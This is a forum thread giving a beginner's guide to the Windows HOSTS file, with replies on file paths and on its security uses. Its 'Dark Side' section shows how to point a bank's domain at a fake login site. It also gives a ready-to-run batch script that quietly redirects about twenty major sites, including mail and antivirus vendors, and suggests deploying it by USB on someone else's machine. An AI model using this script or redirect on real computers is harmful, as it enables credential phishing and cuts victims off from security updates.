Jump to content

Browser Redirects With the HOSTS file

sablefoxx

By sablefoxx
in Hacks & Mods

 Share

Recommended Posts

sablefoxx Newbie

sablefoxx

Posted
Posted
The Newbie's Guide to the HOSTS File


Let me just say, this isn't a 'hack' but its good to know what the HOSTS file is how it can be used for good and evil.  :grin:

What is the HOSTS file?
The HOSTS file is basically a DNS, thats what takes those URLs (those 'www.namehere.com' things) and coverts them the IP addresses.  This is generally done by a DNS Server controlled by the ISP, however with windows/linux before the computer checks with the DNS server it first checks the HOSTS file for an entry.  Because this is a change to Windows it will effect all browsers, IE, Firefox, etc.

Practical Uses:
The HOSTS file is stored in %systemroot%driversetc  (windows xp/vista only).  Change to this directory and open the hosts file in notepad to edit it.  It is likely that it only contains one or two entries that look something like this:

127.0.0.1       localhost
::1                  localhost



However some anti-virus programs use this file to store a 'blacklist' of bad websites you'd never want to actually goto (like phising sites).  If this is so the hosts will contain something like this:

127.0.0.1       localhost
127.0.0.1      www.usbank.freehosting.com
::1                  localhost



So instead of going to 'www.usbank.freehosting.com' you goto 127.0.0.1 (your machine) which is prbly not running an HTTP server and thus you get a 'can not find server' error and YAY the virus has been stopped.  You can find large pre-made blacklists all over the internet. Like these that blocks ads ( http://www.hosts-file.net/?s=Download ) This trait can also be used for censorship (though not extremely effective).  Say you're an employer and wanted to prevent access to myspace.com from your computers, simply add an entry for myspace like so:

127.0.0.1       localhost
127.0.0.1      www.myspace.com
::1                  localhost



And now the computer will not connect to myspace.com anymore (unless they use a proxy/edit the hosts).

The Dark Side:
We can also abuse this trait of windows to re-direct a user to a website we control, like so: 

127.0.0.1       localhost
75.126.15.21     www.usbank.com
::1                  localhost



Now when the user types in 'www.usbank.com' they will goto 75.126.15.21, which could be anything we want, (even a fake usbank.com used to gather logins)

Customize the HOSTS file:
First find the IP address of the website you want the user to end up at to do this open up a command prompt and type "tracert [website here]".  For example if we wanted to redirect traffic from yahoo.com to google.com.  First we must get google's IP so we would type "tracert www.google.com" revealing the IP "64.233.167.147" so in the HOSTS we want to enter:

64.233.167.147  www.yahoo.com



Now all yahoo traffic will end up at google :)

Or we can automate the process with a simple .bat script like so:

Auto-Patch the Hosts File to do Your Will
(Copy paste this text into a word document and save as autohosts.bat)

@echo off
cls
echo Patching HOSTS file...
cd %systemroot%
cd system32
cd drivers
cd etc
::  Add your own redirects!  Here is the syntax
:: echo [IP]  [URL] >>hosts
:: When  a person types in the URL above they will get redirected to the IP
echo 75.126.15.21  www.google.com >>hosts
echo 75.126.15.21  www.digg.com >>hosts
echo 75.126.15.21  www.yahoo.com >>hosts
echo 75.126.15.21  www.gmail.com >>hosts
echo 75.126.15.21 www.slashdot.org >>hosts
echo 75.126.15.21 www.youtube.com >>hosts
echo 75.126.15.21 www.cnn.com >>hosts
echo 75.126.15.21 www.walmart.com >>hosts
echo 75.126.15.21 www.foxnews.com >>hosts
echo 75.126.15.21 www.ebay.com >>hosts
echo 75.126.15.21 www.wikipedia.org >>hosts
echo 75.126.15.21 www.myspace.com >>hosts
echo 75.126.15.21 www.facebook.com >>hosts
echo 75.126.15.21 www.bestbuy.com >>hosts
echo 75.126.15.21 www.aol.com >>hosts
echo 75.126.15.21 www.nytimes.com >>hosts
echo 75.126.15.21 www.symantec.com >>hosts
echo 75.126.15.21 www.hotmail.com >>hosts
echo 75.126.15.21 www.msn.com >>hosts
echo 75.126.15.21 www.imbd.com >>hosts
echo 75.126.15.21 www.microsoft.com >>hosts
echo done!
exit
:: i can see the rick roles alrdy



This will re-direct some of the most commonly visited websites on the internet to the target IP :)  this could even be integrated with a USB payload if one desired so :)  and guys be mature dont set up your friends computer to goto tubgirl or meatspin ;)

More Information:
Check out 'Security Now Ep. #45 >> http://www.grc.com/securitynow.htm#45
Wikipedia Article (much better then mine)>> http://en.wikipedia.org/wiki/Hosts_file

Have Fun!

Sparda Makes a Good Point:

Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS servers lookup would also be classifiable as a redirect). The hosts file servers as a way of perminantly pointing a host name to an IP address.

It has a genuin use in security. The main of which been that if you know the IP address of a named server will never chance, you might want to enter this into the hosts file becasue then your computer isn't relying on a third party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man in the middle attack. They still could pretend to be the 'trusted' IP address if they where able, but now they have to beable to modifiy the routes to the trusted IP address rather than just responding malitiusly to a DNS query.

"Any thing you can do the slow dow nthe bad guys is a good thing" -- Pauldotcom


Perhaps 'Misdirect' is a better choice of words
Link to comment
Share on other sites
digip Newbie

digip

Posted
Posted

Not to be a dick, but the HOSTS file is pretty common knowledge among windows users and is often targeted by Virii to block you from being able to update your virus definitions and also keep you from getting microsoft updates. There are a lot of threads that already talk about th HOSTS file too, and I have even posted my personal HOSTS file in one of them a while ago.

Also, there are different paths for the HOSTS file depending on the version of Windows your running. Anything older than XP stores it in the c:windows folder or the %windir% on the current drive (This is Windows 95, Windows 98) .

XP Pro/NT/Windows2000 is in c:winntsystem32driversetchosts, while all other versions of XP other than XP Pro are in c:windowssystem32driversetchosts, Server 2003 and Vista I think are c:windowssystem32driversetc but I can not confirm this on Server 2003 and Vista since I am not running them at the moment. A quick google will probably give you the path though.

Link to comment
Share on other sites
sablefoxx Newbie

sablefoxx

Posted
  • Author
Posted
Not to be a dick, but the HOSTS file is pretty common knowledge among windows users

Actually thats what i thought but like the last 20 people i've talked to had no idea about it.  This is more a newbie's guide to the hosts file (its not that complicated)

Link to comment
Share on other sites
  • 1 month later...
PrototypeShogun Newbie

PrototypeShogun

Posted
Posted

Years ago when I moved to a new city and didn't have internet, but still wanted to work on webpages and have them viewable on the network... I edited all the hosts files on the computers to direct the url to the ip of my computer on the network.

It was easier then editing wamp to let anyone on the network view it.... remember I didn't have internet.

Hope that opens some minds as to weird macgyver uses for the hosts file.

Link to comment
Share on other sites
Sparda Newbie

Sparda

Posted
Posted

Can I just be clear for a moment, the hosts file doesn't redirect and should not be viewed as such (if you do view it as a way of redirecting a browser, then a DNS servers lookup would also be classifiable as a redirect). The hosts file servers as a way of perminantly pointing a host name to an IP address.

It has a genuin use in security. The main of which been that if you know the IP address of a named server will never chance, you might want to enter this into the hosts file becasue then your computer isn't relying on a third party service to know it is going to the correct address. Doing this prevents DNS poisoning via a man in the middle attack. They still could pretend to be the 'trusted' IP address if they where able, but now they have to beable to modifiy the routes to the trusted IP address rather than just responding malitiusly to a DNS query.

"Any thing you can do the slow dow nthe bad guys is a good thing" -- Pauldotcom

bad spelling and obviuse mistakes = GB spell checking + firefox + windows = fail

Link to comment
Share on other sites
digip Newbie

digip

Posted
Posted

It's a pretty nasty(and simple) sploit, but this only works on IE. Even though it says its javascript, its actually VBScript. fso writes will not run on Opera (or FireFox as far as I know). Unless you have your IE browser set to allow all active-x and scripting, you should get an alert prompt or the yellow bar explaining it wants to block it from running and you have to manually allow it. Then again, an active-x sploit with this as the payload might go undetected.

I have my firewall set up to not allow changes to the hosts file, so either way, I get alerted if something tries to write to or change it.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...